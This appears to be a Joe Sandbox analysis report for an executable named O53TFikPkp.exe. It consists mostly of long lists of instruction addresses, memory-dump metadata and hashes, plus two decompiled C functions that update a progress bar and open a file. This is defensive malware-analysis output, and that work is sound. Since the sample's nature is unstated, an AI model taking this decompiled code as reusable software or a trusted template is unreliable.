                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066c1
                                                                                            0x004066c7
                                                                                            0x004066cd
                                                                                            0x004066e7
                                                                                            0x004066ea
                                                                                            0x004066f0
                                                                                            0x004066fb
                                                                                            0x004066fd
                                                                                            0x004066cf
                                                                                            0x004066cf
                                                                                            0x004066de
                                                                                            0x004066e2
                                                                                            0x004066e2
                                                                                            0x00406707
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406709
                                                                                            0x0040670d
                                                                                            0x004068bc
                                                                                            0x004068d2
                                                                                            0x004068da
                                                                                            0x004068e1
                                                                                            0x004068e3
                                                                                            0x004068ea
                                                                                            0x004068ee
                                                                                            0x004068ee
                                                                                            0x00406719
                                                                                            0x00406720
                                                                                            0x00406728
                                                                                            0x0040672b
                                                                                            0x0040672e
                                                                                            0x0040672e
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x00000000
                                                                                            0x00405eea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ef3
                                                                                            0x00405ef6
                                                                                            0x00405ef9
                                                                                            0x00405efd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f03
                                                                                            0x00405f06
                                                                                            0x00405f08
                                                                                            0x00405f09
                                                                                            0x00405f0c
                                                                                            0x00405f0e
                                                                                            0x00405f0f
                                                                                            0x00405f11
                                                                                            0x00405f14
                                                                                            0x00405f19
                                                                                            0x00405f1e
                                                                                            0x00405f27
                                                                                            0x00405f3a
                                                                                            0x00405f3d
                                                                                            0x00405f49
                                                                                            0x00405f71
                                                                                            0x00405f73
                                                                                            0x00405f81
                                                                                            0x00405f81
                                                                                            0x00405f85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f75
                                                                                            0x00405f78
                                                                                            0x00405f79
                                                                                            0x00405f79
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f4f
                                                                                            0x00405f54
                                                                                            0x00405f54
                                                                                            0x00405f5d
                                                                                            0x00405f65
                                                                                            0x00405f68
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f8b
                                                                                            0x00405f8b
                                                                                            0x00405f8f
                                                                                            0x0040683b
                                                                                            0x00000000
                                                                                            0x0040683b
                                                                                            0x00405f98
                                                                                            0x00405fa8
                                                                                            0x00405fab
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fb1
                                                                                            0x00405fb5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405fb7
                                                                                            0x00405fbd
                                                                                            0x00405fe7
                                                                                            0x00405fed
                                                                                            0x00405ff4
                                                                                            0x00000000
                                                                                            0x00405ff4
                                                                                            0x00405fc3
                                                                                            0x00405fc6
                                                                                            0x00405fcb
                                                                                            0x00405fcb
                                                                                            0x00405fd6
                                                                                            0x00405fde
                                                                                            0x00405fe1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406026
                                                                                            0x0040602c
                                                                                            0x0040602f
                                                                                            0x0040603c
                                                                                            0x00406044
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ffb
                                                                                            0x00405ffb
                                                                                            0x00405fff
                                                                                            0x0040684a
                                                                                            0x00000000
                                                                                            0x0040684a
                                                                                            0x0040600b
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406019
                                                                                            0x0040601c
                                                                                            0x0040601f
                                                                                            0x00406024
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066c1
                                                                                            0x004066c7
                                                                                            0x004066cd
                                                                                            0x004066e7
                                                                                            0x004066ea
                                                                                            0x004066f0
                                                                                            0x004066fb
                                                                                            0x004066fd
                                                                                            0x004066cf
                                                                                            0x004066cf
                                                                                            0x004066de
                                                                                            0x004066e2
                                                                                            0x004066e2
                                                                                            0x00406707
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040604c
                                                                                            0x0040604e
                                                                                            0x00406051
                                                                                            0x004060c2
                                                                                            0x004060c5
                                                                                            0x004060c8
                                                                                            0x004060cf
                                                                                            0x004060d9
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00406053
                                                                                            0x00406057
                                                                                            0x0040605a
                                                                                            0x0040605c
                                                                                            0x0040605f
                                                                                            0x00406062
                                                                                            0x00406064
                                                                                            0x00406067
                                                                                            0x00406069
                                                                                            0x0040606e
                                                                                            0x00406071
                                                                                            0x00406074
                                                                                            0x00406078
                                                                                            0x0040607f
                                                                                            0x00406082
                                                                                            0x00406089
                                                                                            0x0040608d
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406099
                                                                                            0x0040609c
                                                                                            0x004060ba
                                                                                            0x004060bc
                                                                                            0x00000000
                                                                                            0x0040609e
                                                                                            0x0040609e
                                                                                            0x004060a1
                                                                                            0x004060a4
                                                                                            0x004060a7
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060ac
                                                                                            0x004060af
                                                                                            0x004060b1
                                                                                            0x004060b2
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x004062eb
                                                                                            0x004062ef
                                                                                            0x0040630d
                                                                                            0x00406310
                                                                                            0x00406317
                                                                                            0x0040631a
                                                                                            0x0040631d
                                                                                            0x00406320
                                                                                            0x00406323
                                                                                            0x00406326
                                                                                            0x00406328
                                                                                            0x0040632f
                                                                                            0x00406330
                                                                                            0x00406332
                                                                                            0x00406335
                                                                                            0x00406338
                                                                                            0x0040633b
                                                                                            0x0040633b
                                                                                            0x00406340
                                                                                            0x00000000
                                                                                            0x00406340
                                                                                            0x004062f1
                                                                                            0x004062f4
                                                                                            0x004062f7
                                                                                            0x00406301
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406398
                                                                                            0x0040639c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063a2
                                                                                            0x004063a6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063ac
                                                                                            0x004063ae
                                                                                            0x004063b2
                                                                                            0x004063b2
                                                                                            0x004063b5
                                                                                            0x004063b9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406409
                                                                                            0x0040640d
                                                                                            0x00406414
                                                                                            0x00406417
                                                                                            0x0040641a
                                                                                            0x00406424
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x0040640f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406430
                                                                                            0x00406434
                                                                                            0x0040643b
                                                                                            0x0040643e
                                                                                            0x00406441
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406444
                                                                                            0x00406447
                                                                                            0x0040644a
                                                                                            0x0040644a
                                                                                            0x0040644d
                                                                                            0x00406450
                                                                                            0x00406453
                                                                                            0x00406453
                                                                                            0x00406456
                                                                                            0x0040645d
                                                                                            0x00406462
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004064f0
                                                                                            0x004064f0
                                                                                            0x004064f4
                                                                                            0x00406892
                                                                                            0x00000000
                                                                                            0x00406892
                                                                                            0x004064fa
                                                                                            0x004064fd
                                                                                            0x00406500
                                                                                            0x00406504
                                                                                            0x00406507
                                                                                            0x0040650d
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x00406512
                                                                                            0x00406515
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004060e5
                                                                                            0x004060e5
                                                                                            0x004060e9
                                                                                            0x00406856
                                                                                            0x00000000
                                                                                            0x00406856
                                                                                            0x004060ef
                                                                                            0x004060f2
                                                                                            0x004060f5
                                                                                            0x004060f9
                                                                                            0x004060fc
                                                                                            0x00406102
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406107
                                                                                            0x0040610a
                                                                                            0x0040610a
                                                                                            0x0040610d
                                                                                            0x00406110
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406116
                                                                                            0x0040611c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406122
                                                                                            0x00406122
                                                                                            0x00406126
                                                                                            0x00406129
                                                                                            0x0040612c
                                                                                            0x0040612f
                                                                                            0x00406132
                                                                                            0x00406133
                                                                                            0x00406136
                                                                                            0x00406138
                                                                                            0x0040613e
                                                                                            0x00406141
                                                                                            0x00406144
                                                                                            0x00406147
                                                                                            0x0040614a
                                                                                            0x0040614d
                                                                                            0x00406150
                                                                                            0x0040616c
                                                                                            0x0040616f
                                                                                            0x00406172
                                                                                            0x00406175
                                                                                            0x0040617c
                                                                                            0x00406180
                                                                                            0x00406182
                                                                                            0x00406186
                                                                                            0x00406152
                                                                                            0x00406152
                                                                                            0x00406156
                                                                                            0x0040615e
                                                                                            0x00406163
                                                                                            0x00406165
                                                                                            0x00406167
                                                                                            0x00406167
                                                                                            0x00406189
                                                                                            0x00406190
                                                                                            0x00406193
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x0040619e
                                                                                            0x0040619e
                                                                                            0x004061a2
                                                                                            0x00406862
                                                                                            0x00000000
                                                                                            0x00406862
                                                                                            0x004061a8
                                                                                            0x004061ab
                                                                                            0x004061ae
                                                                                            0x004061b2
                                                                                            0x004061b5
                                                                                            0x004061bb
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061c0
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004061cb
                                                                                            0x004061ce
                                                                                            0x004061d1
                                                                                            0x004061d4
                                                                                            0x004061d7
                                                                                            0x004061da
                                                                                            0x004061dd
                                                                                            0x004061e0
                                                                                            0x004061e3
                                                                                            0x004061e6
                                                                                            0x004061e9
                                                                                            0x00406201
                                                                                            0x00406204
                                                                                            0x00406207
                                                                                            0x0040620a
                                                                                            0x0040620a
                                                                                            0x0040620d
                                                                                            0x00406211
                                                                                            0x00406213
                                                                                            0x004061eb
                                                                                            0x004061eb
                                                                                            0x004061f3
                                                                                            0x004061f8
                                                                                            0x004061fa
                                                                                            0x004061fc
                                                                                            0x004061fc
                                                                                            0x00406216
                                                                                            0x0040621d
                                                                                            0x00406220
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00406220
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406262
                                                                                            0x00406262
                                                                                            0x00406266
                                                                                            0x0040686e
                                                                                            0x00000000
                                                                                            0x0040686e
                                                                                            0x0040626c
                                                                                            0x0040626f
                                                                                            0x00406272
                                                                                            0x00406276
                                                                                            0x00406279
                                                                                            0x0040627f
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406284
                                                                                            0x00406287
                                                                                            0x00406287
                                                                                            0x0040628d
                                                                                            0x0040622b
                                                                                            0x0040622b
                                                                                            0x0040622e
                                                                                            0x00000000
                                                                                            0x0040622e
                                                                                            0x0040628f
                                                                                            0x0040628f
                                                                                            0x00406292
                                                                                            0x00406295
                                                                                            0x00406298
                                                                                            0x0040629b
                                                                                            0x0040629e
                                                                                            0x004062a1
                                                                                            0x004062a4
                                                                                            0x004062a7
                                                                                            0x004062aa
                                                                                            0x004062ad
                                                                                            0x004062c5
                                                                                            0x004062c8
                                                                                            0x004062cb
                                                                                            0x004062ce
                                                                                            0x004062ce
                                                                                            0x004062d1
                                                                                            0x004062d5
                                                                                            0x004062d7
                                                                                            0x004062af
                                                                                            0x004062af
                                                                                            0x004062b7
                                                                                            0x004062bc
                                                                                            0x004062be
                                                                                            0x004062c0
                                                                                            0x004062c0
                                                                                            0x004062da
                                                                                            0x004062e1
                                                                                            0x004062e4
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x00406573
                                                                                            0x00406573
                                                                                            0x00406577
                                                                                            0x0040689e
                                                                                            0x00000000
                                                                                            0x0040689e
                                                                                            0x0040657d
                                                                                            0x00406580
                                                                                            0x00406583
                                                                                            0x00406587
                                                                                            0x0040658a
                                                                                            0x00406590
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406595
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406343
                                                                                            0x00406343
                                                                                            0x00406346
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x00406682
                                                                                            0x00406686
                                                                                            0x004066a8
                                                                                            0x004066ab
                                                                                            0x004066b5
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00406688
                                                                                            0x0040668b
                                                                                            0x0040668f
                                                                                            0x00406692
                                                                                            0x00406692
                                                                                            0x00406695
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040673f
                                                                                            0x00406743
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406768
                                                                                            0x0040676f
                                                                                            0x00406776
                                                                                            0x00406776
                                                                                            0x00000000
                                                                                            0x00406776
                                                                                            0x00406745
                                                                                            0x00406748
                                                                                            0x0040674b
                                                                                            0x0040674e
                                                                                            0x00406755
                                                                                            0x00406699
                                                                                            0x00406699
                                                                                            0x0040669c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406830
                                                                                            0x00406833
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040646a
                                                                                            0x0040646c
                                                                                            0x00406473
                                                                                            0x00406474
                                                                                            0x00406476
                                                                                            0x00406479
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406481
                                                                                            0x00406484
                                                                                            0x00406487
                                                                                            0x00406489
                                                                                            0x0040648b
                                                                                            0x0040648b
                                                                                            0x0040648c
                                                                                            0x0040648f
                                                                                            0x00406496
                                                                                            0x00406499
                                                                                            0x004064a7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040677d
                                                                                            0x0040677d
                                                                                            0x00406780
                                                                                            0x00406787
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040678c
                                                                                            0x0040678c
                                                                                            0x00406790
                                                                                            0x004068c8
                                                                                            0x00000000
                                                                                            0x004068c8
                                                                                            0x00406796
                                                                                            0x00406799
                                                                                            0x0040679c
                                                                                            0x004067a0
                                                                                            0x004067a3
                                                                                            0x004067a9
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ae
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b4
                                                                                            0x004067b4
                                                                                            0x004067b8
                                                                                            0x00406818
                                                                                            0x0040681b
                                                                                            0x00406820
                                                                                            0x00406821
                                                                                            0x00406823
                                                                                            0x00406825
                                                                                            0x00406828
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x0040673a
                                                                                            0x00406734
                                                                                            0x004067ba
                                                                                            0x004067c0
                                                                                            0x004067c3
                                                                                            0x004067c6
                                                                                            0x004067c9
                                                                                            0x004067cc
                                                                                            0x004067cf
                                                                                            0x004067d2
                                                                                            0x004067d5
                                                                                            0x004067d8
                                                                                            0x004067db
                                                                                            0x004067f4
                                                                                            0x004067f7
                                                                                            0x004067fa
                                                                                            0x004067fd
                                                                                            0x00406801
                                                                                            0x00406803
                                                                                            0x00406803
                                                                                            0x00406804
                                                                                            0x00406807
                                                                                            0x004067dd
                                                                                            0x004067dd
                                                                                            0x004067e5
                                                                                            0x004067ea
                                                                                            0x004067ec
                                                                                            0x004067ef
                                                                                            0x004067ef
                                                                                            0x0040680a
                                                                                            0x00406811
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x004064af
                                                                                            0x004064b2
                                                                                            0x004064e8
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x0040661b
                                                                                            0x0040661b
                                                                                            0x0040661e
                                                                                            0x00406620
                                                                                            0x004068aa
                                                                                            0x00000000
                                                                                            0x004068aa
                                                                                            0x00406626
                                                                                            0x00406629
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040662f
                                                                                            0x00406633
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00000000
                                                                                            0x00406636
                                                                                            0x004064b4
                                                                                            0x004064b6
                                                                                            0x004064b8
                                                                                            0x004064ba
                                                                                            0x004064bd
                                                                                            0x004064be
                                                                                            0x004064c0
                                                                                            0x004064c2
                                                                                            0x004064c5
                                                                                            0x004064c8
                                                                                            0x004064de
                                                                                            0x004064e3
                                                                                            0x0040651b
                                                                                            0x0040651b
                                                                                            0x0040651f
                                                                                            0x0040654b
                                                                                            0x0040654d
                                                                                            0x00406554
                                                                                            0x00406557
                                                                                            0x0040655a
                                                                                            0x0040655a
                                                                                            0x0040655f
                                                                                            0x0040655f
                                                                                            0x00406561
                                                                                            0x00406564
                                                                                            0x0040656b
                                                                                            0x0040656e
                                                                                            0x0040659b
                                                                                            0x0040659b
                                                                                            0x0040659e
                                                                                            0x004065a1
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00000000
                                                                                            0x00406615
                                                                                            0x004065a3
                                                                                            0x004065a9
                                                                                            0x004065ac
                                                                                            0x004065af
                                                                                            0x004065b2
                                                                                            0x004065b5
                                                                                            0x004065b8
                                                                                            0x004065bb
                                                                                            0x004065be
                                                                                            0x004065c1
                                                                                            0x004065c4
                                                                                            0x004065dd
                                                                                            0x004065df
                                                                                            0x004065e2
                                                                                            0x004065e3
                                                                                            0x004065e6
                                                                                            0x004065e8
                                                                                            0x004065eb
                                                                                            0x004065ed
                                                                                            0x004065ef
                                                                                            0x004065f2
                                                                                            0x004065f4
                                                                                            0x004065f7
                                                                                            0x004065fb
                                                                                            0x004065fd
                                                                                            0x004065fd
                                                                                            0x004065fe
                                                                                            0x00406601
                                                                                            0x00406604
                                                                                            0x004065c6
                                                                                            0x004065c6
                                                                                            0x004065ce
                                                                                            0x004065d3
                                                                                            0x004065d5
                                                                                            0x004065d8
                                                                                            0x004065d8
                                                                                            0x00406607
                                                                                            0x0040660e
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x0040660e
                                                                                            0x00406521
                                                                                            0x00406524
                                                                                            0x00406526
                                                                                            0x00406529
                                                                                            0x0040652c
                                                                                            0x0040652f
                                                                                            0x00406531
                                                                                            0x00406534
                                                                                            0x00406537
                                                                                            0x00406537
                                                                                            0x0040653a
                                                                                            0x0040653a
                                                                                            0x0040653d
                                                                                            0x00406544
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00406544
                                                                                            0x004064ca
                                                                                            0x004064cd
                                                                                            0x004064cf
                                                                                            0x004064d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406231
                                                                                            0x00406231
                                                                                            0x00406235
                                                                                            0x0040687a
                                                                                            0x00000000
                                                                                            0x0040687a
                                                                                            0x0040623b
                                                                                            0x0040623e
                                                                                            0x00406241
                                                                                            0x00406244
                                                                                            0x00406247
                                                                                            0x0040624a
                                                                                            0x0040624d
                                                                                            0x0040624f
                                                                                            0x00406252
                                                                                            0x00406255
                                                                                            0x00406258
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063bc
                                                                                            0x004063bc
                                                                                            0x004063c0
                                                                                            0x00406886
                                                                                            0x00000000
                                                                                            0x00406886
                                                                                            0x004063c6
                                                                                            0x004063c9
                                                                                            0x004063cc
                                                                                            0x004063cf
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d4
                                                                                            0x004063d7
                                                                                            0x004063da
                                                                                            0x004063dd
                                                                                            0x004063e0
                                                                                            0x004063e3
                                                                                            0x004063e4
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e9
                                                                                            0x004063ec
                                                                                            0x004063ef
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f5
                                                                                            0x004063f7
                                                                                            0x004063f7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x0040663d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406643
                                                                                            0x00406646
                                                                                            0x00406649
                                                                                            0x0040664c
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x00406651
                                                                                            0x00406654
                                                                                            0x00406657
                                                                                            0x0040665a
                                                                                            0x0040665d
                                                                                            0x00406660
                                                                                            0x00406661
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406666
                                                                                            0x00406669
                                                                                            0x0040666c
                                                                                            0x0040666f
                                                                                            0x00406672
                                                                                            0x00406676
                                                                                            0x00406678
                                                                                            0x0040667b
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x004063fa
                                                                                            0x004063fa
                                                                                            0x00000000
                                                                                            0x004063fa
                                                                                            0x0040667b
                                                                                            0x004068b0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x004068e7
                                                                                            0x004068e7
                                                                                            0x00000000
                                                                                            0x004068e7
                                                                                            0x00406734
                                                                                            0x004066bb
                                                                                            0x004066b8

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                                                                                            • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                                                                                            • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                                                                                            • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 69%
                                                                                            			E00401389(signed int _a4) {
                                                                                            				intOrPtr* _t6;
                                                                                            				void* _t8;
                                                                                            				void* _t10;
                                                                                            				signed int _t11;
                                                                                            				void* _t12;
                                                                                            				signed int _t16;
                                                                                            				signed int _t17;
                                                                                            				void* _t18;
                                                                                            
                                                                                            				_t17 = _a4;
                                                                                            				while(_t17 >= 0) {
                                                                                            					_t6 = _t17 * 0x1c +  *0x423ed0;
                                                                                            					if( *_t6 == 1) {
                                                                                            						break;
                                                                                            					}
                                                                                            					_push(_t6); // executed
                                                                                            					_t8 = E00401434(); // executed
                                                                                            					if(_t8 == 0x7fffffff) {
                                                                                            						return 0x7fffffff;
                                                                                            					}
                                                                                            					_t10 = E0040136D(_t8);
                                                                                            					if(_t10 != 0) {
                                                                                            						_t11 = _t10 - 1;
                                                                                            						_t16 = _t17;
                                                                                            						_t17 = _t11;
                                                                                            						_t12 = _t11 - _t16;
                                                                                            					} else {
                                                                                            						_t12 = _t10 + 1;
                                                                                            						_t17 = _t17 + 1;
                                                                                            					}
                                                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                            						 *0x42368c =  *0x42368c + _t12;
                                                                                            						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                                                                                            					}
                                                                                            				}
                                                                                            				return 0;
                                                                                            			}











                                                                                            0x0040138a
                                                                                            0x004013fa
                                                                                            0x0040139b
                                                                                            0x004013a0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004013a2
                                                                                            0x004013a3
                                                                                            0x004013ad
                                                                                            0x00000000
                                                                                            0x00401404
                                                                                            0x004013b0
                                                                                            0x004013b7
                                                                                            0x004013bd
                                                                                            0x004013be
                                                                                            0x004013c0
                                                                                            0x004013c2
                                                                                            0x004013b9
                                                                                            0x004013b9
                                                                                            0x004013ba
                                                                                            0x004013ba
                                                                                            0x004013c9
                                                                                            0x004013cb
                                                                                            0x004013f4
                                                                                            0x004013f4
                                                                                            0x004013c9
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                            • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                                                                            • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                            • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 68%
                                                                                            			E0040575C(CHAR* _a4, long _a8, long _a12) {
                                                                                            				signed int _t5;
                                                                                            				void* _t6;
                                                                                            
                                                                                            				_t5 = GetFileAttributesA(_a4); // executed
                                                                                            				asm("sbb ecx, ecx");
                                                                                            				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                            				return _t6;
                                                                                            			}





                                                                                            0x00405760
                                                                                            0x0040576d
                                                                                            0x00405782
                                                                                            0x00405788

                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\O53TFikPkp.exe,80000000,00000003), ref: 00405760
                                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
